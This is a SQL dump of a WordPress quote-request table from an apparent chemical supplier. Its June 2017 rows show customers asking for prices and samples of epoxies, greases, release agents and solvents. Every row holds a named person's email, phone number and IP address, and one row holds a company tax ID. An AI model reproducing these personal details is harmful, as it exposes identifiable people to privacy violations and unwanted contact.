INSERT INTO `wp_enquiry_detail_new` VALUES (1124, 'Ben Akard', 'newdirections@nds-inc.com', 'Need pricing and lead time for MS-222N.   I am looking for a quantity of 100.', '515274-0004', 'Quote', '65.101.160.94', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"489";s:5:"title";s:20:"AeroDuster® MS-222N";s:5:"price";s:0:"";s:5:"quant";s:3:"100";s:3:"img";s:77:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/aero-dusters.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-06-21 19:40:35', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1125, 'Andrew Abbott', 'andrew.abbott.2.ctr@us.af.mil', 'Hello,\nI\'d like a quote for 1 gallon of EPON 826 resin.\nThank you,\nAndrew', '937255-1138', 'EPON 826 quote', '140.32.183.252', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"861";s:5:"title";s:11:"EPON™ 826";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:77:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/EPON-RESIN-1.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-06-22 15:37:39', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1126, 'Pedro Moreira da Silva', 'pedro.dc.moreira@gmail.com', 'Good afternoon,\nDo you have any information where to buy this product in Portugal or the nearest country?\nI also wouyld like to inqury on the price and delivery time for a small quantity of cans.  (our client only needs 1)\nBest Regards \nPedro Moreira da Silva', '+351917640634', 'Location in Portugal ', '85.244.252.222', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1338";s:5:"title";s:42:"MS-260 Plastic, Glass &#038; Metal Cleaner";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:72:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/cleaner.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-06-23 10:59:17', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1127, 'Jay Johnston', 'Jay.johnston@covestro.com', 'Hello,\n\nWould it be possible to get a quart sample of Heloxy 61?\n\nJay Johnston\nCovestro\nOne Covestro Circle, bld 8\nPittsburgh, PA 15205\n\nregards,\n\nJay Johnston', '412413-2512', 'Quart Sample', '50.232.182.123', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1069";s:5:"title";s:12:"HELOXY™ 61";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:74:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/HELOXY-61.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-06-23 12:19:54', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1128, 'Stephen Burgess', 'stephen.burgess@texceltechnology.com', 'Dear Sales, , \nRe: Acrylic Conformal Coating MS-475C\n\nLooking to procure the above material, but need the material ASAP, is there a UK distributor that holds stock of the item in question?\n\nReally would appreciate your assistance here. \n\nThank you in advance for your support in this matter and I look forward to hearing from you shortly. \n\nKind Regards, \nStephen Burgess. \n\n\n\n\n\n\n ', '+4401322621725', 'MS-475C', '188.39.111.186', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"621";s:5:"title";s:36:"MS-475C | Acrylic Conformal Coatings";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:72:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/MS-475C.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-06-23 12:28:02', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1129, 'Tracy Wilkins', 'crmoulder@bellnet.ca', 'We are a rotational moulding company in the york region area. we don\'t require a release agent often but when we did we used monocoat 1905 RF which we got from the USA but now border patrol will not let it over here. We have a few questions for you.\n\n1. is this product comparable?\n2. what is the cost for a gallon of it? \n3. once applied roughly how many rounds will they get per application? Any other information that you could provide would be great. Thank you very much.\n', '905841-6822', 'A few questions,', '74.14.222.199', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"4402";s:5:"title";s:49:"ReleaSys™ RM | Rotational Molding Release Agent";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:87:"https://www.miller-stephenson.com/wp-content/uploads/2017/06/shutterstock_551871304.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-06-23 14:40:43', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1130, 'Gerald Wilson', 'gw@autonomicmaterials.com', 'I would like to order 1 gallon of Epikure 3274. I believe our company (Autonomic Materials, Inc.) may be in your system as we have ordered from you before but I do not currently have a contact at your organization. I would like to get this ordered ASAP. Look forward to hearing from you.', '217863-2023', 'Need to Order Epikure 3274', '206.221.153.120', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1191";s:5:"title";s:15:"EPIKURE™ 3274";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:74:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/EPIKURE-2.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-06-23 15:01:32', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1131, 'Craig Schierholt', 'craig.schierholt@sncorp.com', 'Hi, I need a quote for 120 cans of MS-555.\nThanks,\nCraig Schierholt', '916850-7134', 'MS-555 Quote', '12.231.151.100', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1384";s:5:"title";s:10:"MS-555/557";s:5:"price";s:0:"";s:5:"quant";s:3:"120";s:3:"img";s:77:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/flux-remover.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-06-23 15:46:37', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1132, 'Keith', 'Kedenfield@avltech.com', 'Is there a local distributor for MS-470S Urethane Conformal coating - Asheville, NC', '828210-3546', '', '70.43.54.26', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"190";s:5:"title";s:7:"MS-470S";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:72:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/MS-470S.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-06-23 21:17:11', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1133, 'Kyu Bin Han', 'kbhan@uwaterloo.ca', 'Hello,\n\nMy name is Kyu Bin Han and I am a masters student working at the University of Waterloo in Canada.\nWe currently use PTFE dry film lubricant in metal forming tests which must be removed after forming.\nIs this product capable of removing the lubricant?\n\nThank you,\n\nKyu Bin Han\nMASc Candidate\nDepartment of Mechanical and Mechatronics Engineering\nUniversity of Waterloo\nOffice: EC4\n', '1519-729-5585', 'Removing PTFE', '129.97.250.61', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1711";s:5:"title";s:41:"PFPE Re-Move™ MS 250/252 Krytox Cleaner";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:71:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/MS-250.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-06-25 20:10:55', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1134, 'hsueh-ying chen', 'hsueh-ying.chen@nih.gov', 'Can you please e-mail me a quote about your product, MS-111 Epoxy Stripping Agent? Thanks.', '', 'price', '128.231.5.201', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1152";s:5:"title";s:28:"MS-111 Epoxy Stripping Agent";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:87:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/MS-111-EPOXY-STRIPPING.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-06-26 13:46:10', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1135, 'john hessburg', 'hessburg@q2products.com', 'For 2Kg = 4 x .5Kg tubs/jars', '952898-2575', 'Quote for Krytox XHT-AC grease', '24.118.171.17', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"672";s:5:"title";s:6:"XHT-AC";s:5:"price";s:0:"";s:5:"quant";s:1:"2";s:3:"img";s:87:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/shutterstock_340828220.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-06-26 14:00:12', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1136, 'David Chapin', 'corkychapin@gmail.com', 'Am looking for the price and where I can buy aerosole cans of Solvent Flux Remover......Thanks', '203377-2775', 'Price Quote', '148.74.48.251', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1693";s:5:"title";s:39:"H0805A &#038; H0B05B Flux Remover Spray";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:80:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/ms-flux-remover.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-06-26 14:38:34', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1137, 'David Chapin', 'corkychapin@gmail.com', 'Am looking for the price and where I can buy aerosole cans of Solvent Flux Remover......Thanks', '203377-2775', 'Price Quote', '148.74.48.251', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1693";s:5:"title";s:39:"H0805A &#038; H0B05B Flux Remover Spray";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:80:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/ms-flux-remover.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-06-26 14:39:07', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1138, 'Emilio', 'emilio.rodriguez@II-VI.com', 'Just need a quote so that we can order 4 cans.', '214994-2340', 'Price', '70.253.148.170', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1677";s:5:"title";s:38:"MS-122AD | Dry Film PTFE release agent";s:5:"price";s:0:"";s:5:"quant";s:1:"4";s:3:"img";s:92:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/ms-122ad-dry-film-lubricant.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-06-26 15:50:17', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1139, 'Eric', 'eric.gladden@solvay.com', 'Hi, could I get a quote for 12 (14oz) cans of MS-122AD PTFE release agent. Dry lubricant. \n\nThanks!\nEric', '864299-9309', 'quote', '199.254.206.4', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1677";s:5:"title";s:38:"MS-122AD | Dry Film PTFE release agent";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:92:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/ms-122ad-dry-film-lubricant.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-06-26 19:33:40', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1140, 'nathan raz', 'nlraz@012.net.il', 'only one set', '', 'i want to buy epoxy 907', '77.125.166.126', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1149";s:5:"title";s:30:"MS-907 Two-Part Epoxy Adhesive";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:71:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/MS-907.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-06-26 19:56:02', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1141, 'KAREN DUSENBURY', 'KDUSENBURY@CAPTORCORP.COM', 'Please quote 1, 5, &amp; 15 cans of MS-475C.  ', '937667-8484', 'QUOTE for Captor Corporation', '24.106.100.106', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"621";s:5:"title";s:36:"MS-475C | Acrylic Conformal Coatings";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:72:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/MS-475C.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-06-26 21:25:26', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1142, 'Elliot Fisher', 'elliot@nanosurfacebio.com', 'Quote request.', '+1206-604-9280', 'Dry Film FTFE release agent', '128.95.134.201', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1677";s:5:"title";s:38:"MS-122AD | Dry Film PTFE release agent";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:92:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/ms-122ad-dry-film-lubricant.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-06-26 21:47:14', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1143, 'Julio López', 'jlopez@astrogrp.com.ni', 'Buenas tardes estimados,\n\nMi nombre es Julio López, responsable de compras en ASTRO CARTÓN NICARAGUA 2ND, S.A. Una corrugadora de cartón en Nicaragua. Actualmente estamos requiriendo oferta por tres cubetas de 44 libras de grasa corrugator krytox 226 FG. \n\nPor favor enviarme propuesta con los siguientes datos:\n\nASTRO CARTÓN NICARAGUA 2ND, S.A.\nZona Franca Operadora Astro Nicaragua S.A.\nKM 47 1/2 Carretera Tipitapa-Masaya, Nicaragua.\nRUC: J031000002-0256\n\nAgradeciendo su apoyo de antemano.\n', '', 'CORRUGATOR KRYTOX 226 FG', '190.107.208.36', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"2741";s:5:"title";s:24:"226 FG Corrugator Grease";s:5:"price";s:0:"";s:5:"quant";s:1:"3";s:3:"img";s:87:"https://www.miller-stephenson.com/wp-content/uploads/2016/10/shutterstock_353441450.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-06-26 23:01:14', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1144, 'Gail Alsobrook', 'gailalsobrook@gmail.com', 'I have a new sofa recommending "S" type cleaning solvent. Please let me know if I can purchase from you for home use.', '619655-0021', 'Upholstery Cleaner', '174.66.186.114', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1287";s:5:"title";s:4:"Sion";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:76:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/opteon-sion.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-06-27 00:06:23', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1145, 'Ross Weddell', 'ross.weddell@appliedgraphenematerials.com', 'To Whom This May Concern\n\nPlease could I have a quotation for 1 gallon of the said resin for shipping to the UK? Or could you direct towards a UK/EMEA supplier of the resin?\n\nMany Thanks In Anticipation\n\nRoss', '', 'Potential Purchase of EPON 1001 X -75', '212.250.134.242', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"918";s:5:"title";s:17:"EPON™ 1001-X-75";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:77:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/EPON-RESIN-1.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-06-27 09:11:56', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1146, 'HEINIS', 'jeremie.heinis@maskaviation.fr', 'Hello,\n\nCould you please send me a quotation for 3 MS-260 Cleaner?\n\nThanks in advance,\n\nBest regards,\n\nJeremie', '+33760484838', 'Quote request', '79.132.38.48', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1338";s:5:"title";s:42:"MS-260 Plastic, Glass &#038; Metal Cleaner";s:5:"price";s:0:"";s:5:"quant";s:1:"3";s:3:"img";s:72:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/cleaner.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-06-27 13:01:44', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1147, 'Anthony Torchia', 'ttorchia@edmondmarks.com', 'Please quote M-114C in 1 qt and 1/2 gallon sizes', '732643-0290', 'MS 114C', '98.109.101.115', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"623";s:5:"title";s:7:"MS-114D";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:72:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/MS-114C.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-06-27 13:42:42', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1148, 'Rafael Mulero', 'rafael_mulero@agilent.com', 'Hello,\n\nMay I have a quote for 10 cans of both MS222N &amp; L\n\nThank you', '302636-1673', 'Quote for AeroDuster MS-222N &amp; L', '104.129.194.122', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"489";s:5:"title";s:20:"AeroDuster® MS-222N";s:5:"price";s:0:"";s:5:"quant";s:2:"10";s:3:"img";s:77:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/aero-dusters.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-06-27 14:30:31', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1149, 'David Offord', 'david@fluoryx.com', 'Hi.  Please quote me for around 500-1000mL of Vertrel MCA.  I will use it as a solvent for chemical lab work.  Thanks.', '775501-2811', 'Vertel MCA for lab use', '104.181.77.80', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1263";s:5:"title";s:14:"Vertrel™ MCA";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:80:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/vertrel-solvent.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-06-27 16:32:56', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1150, 'Dylan Rolleigh', 'dylanrolleigh@shawmountaintechnology.com', 'Is it possible to receive a sample to determine if the release agent meets our production requirements?', '208869-0251', 'Release Agent', '207.170.247.50', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"182";s:5:"title";s:29:"MS-122AV | PTFE release agent";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:75:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/Automotive.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-06-27 17:08:56', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1151, 'Kirsten Rodriguez', 'krodriguez@dpss-lasers.com', 'Can I please get a quote for a 0.5oz tube of GPL 207', '408988-4300', 'Quote Needed', '107.203.255.106', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"814";s:5:"title";s:7:"GPL 207";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:87:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/shutterstock_230407642.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-06-27 17:15:08', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1152, 'Rob Kramer', 'robert.kramer@aecom.com', 'What is the price for the 0.5 kg and 0.8 containers for the GPL anti-corrosion greases (GPL220-227)?', '', '', '104.129.200.86', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"852";s:5:"title";s:7:"GPL 227";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:87:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/shutterstock_316632911.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-06-27 17:44:32', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1153, 'Ram', 'adhikary.rc@gmail.com', 'We are looking for a suitable mold release agent; the mold is made from PLA and we are molding Polyurethane resins.\nPlease send us the quote for this application, and also let me know if you could send us samples for evaluation.\n\nThank you.\nRam ', '587832-1997', 'release agent for mold', '136.159.99.92', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"290";s:5:"title";s:47:"ReleaSys™ 8800 | Composite Mold Release Agent";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:102:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/shutterstock_259045955-e1494258222421.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-06-27 19:53:23', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1154, 'Donald Miller', 'donevis@cs.com', 'Filling void around shaft intersecting fiberglass surface at approx 10 deg.  filling area no more then 10 square inches.', '301438-0307', 'epoxy mold release', '108.45.119.6', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"2771";s:5:"title";s:9:"MS-122SEL";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:87:"https://www.miller-stephenson.com/wp-content/uploads/2016/10/shutterstock_495450013.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-06-28 15:40:48', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1155, 'Everett Bauer', 'ebauer@haygor.com', 'Pricing on 1 kg, 5kg, and 20 kg sizes', '713641-1791', 'Pricing  VFP 1506', '96.91.43.153', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"943";s:5:"title";s:8:"VPF 1506";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:87:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/shutterstock_257574442.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-06-28 16:30:08', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1156, 'Tom Kelly', 'thomas.kelly@jetaviation.com', 'Could you please tell me the shelf life of MS-260, MS-122DF &amp; MS-242N-AS.', '973975-6400', 'Shelf life for your products', '24.193.168.53', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1719";s:5:"title";s:21:"Quik-Freeze® MS-242N";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:76:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/quik-freeze.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-06-28 17:09:08', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1157, 'Scott Davin', 'Davininc@sbcglobal.net', 'Looking for best solvent to clean krytox 215 . New Indycar team looking for supplier  for solvent. ', '317918-2154', 'Krytox solvent cleaner', '107.77.207.101', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1278";s:5:"title";s:10:"Vertrel XF";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:75:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/vertrel-xf.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-06-28 17:50:02', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1158, 'Tony Autry', 'aautry@harris.com', 'Looking to purchase 1 each.  I had purchased 1 from Grainger back in January 2017 and the product is now hard and unusable/', '402293-3311', 'Request for Quote for a Buy', '192.107.156.196', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1149";s:5:"title";s:30:"MS-907 Two-Part Epoxy Adhesive";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:71:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/MS-907.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-06-28 19:13:59', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1159, 'Araz Sheibani Aghdam', 'araz@sabanciuniv.edu', 'I am a Ph.D. student of material science at Sabanci University. could you please provide us a quote for GPL 100?\n\nregards\naraz', '+905054216586', 'Inquiry for GPL 100', '159.20.90.82', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"421";s:5:"title";s:7:"GPL 100";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:86:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/krytox-gpl-oil-grease.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-06-28 20:51:58', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1160, 'Ron Taylor', 'Rocky482007@yahoo.cs', 'Use a cement mold.  Sealed with a shellac and oil base paint. To be used for fibreglass or epoxy resin.\nNeed to know appropriate release agent including cost and availability\n', '', 'Mold release agent', '24.57.6.130', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"4336";s:5:"title";s:43:"ReleaSys™ 9900 | Fiberglass Release Agent";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:87:"https://www.miller-stephenson.com/wp-content/uploads/2017/05/shutterstock_528597541.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-06-29 02:37:41', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1161, 'Joseph Parker', 'joseph.parker@nrl.navy.mil', 'I am looking to get a cost estimate for ReleaSys HT | Boron Nitride Coatings.  Many thanks!', '202404-8698', 'ReleaSys HT Boron Nitrate Coating', '132.250.150.219', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"3787";s:5:"title";s:39:"ReleaSys™ HT | Boron Nitride Coatings";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:87:"https://www.miller-stephenson.com/wp-content/uploads/2017/03/shutterstock_442773265.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-06-29 15:09:38', '', NULL, '', '', '', NULL, '', ''); 
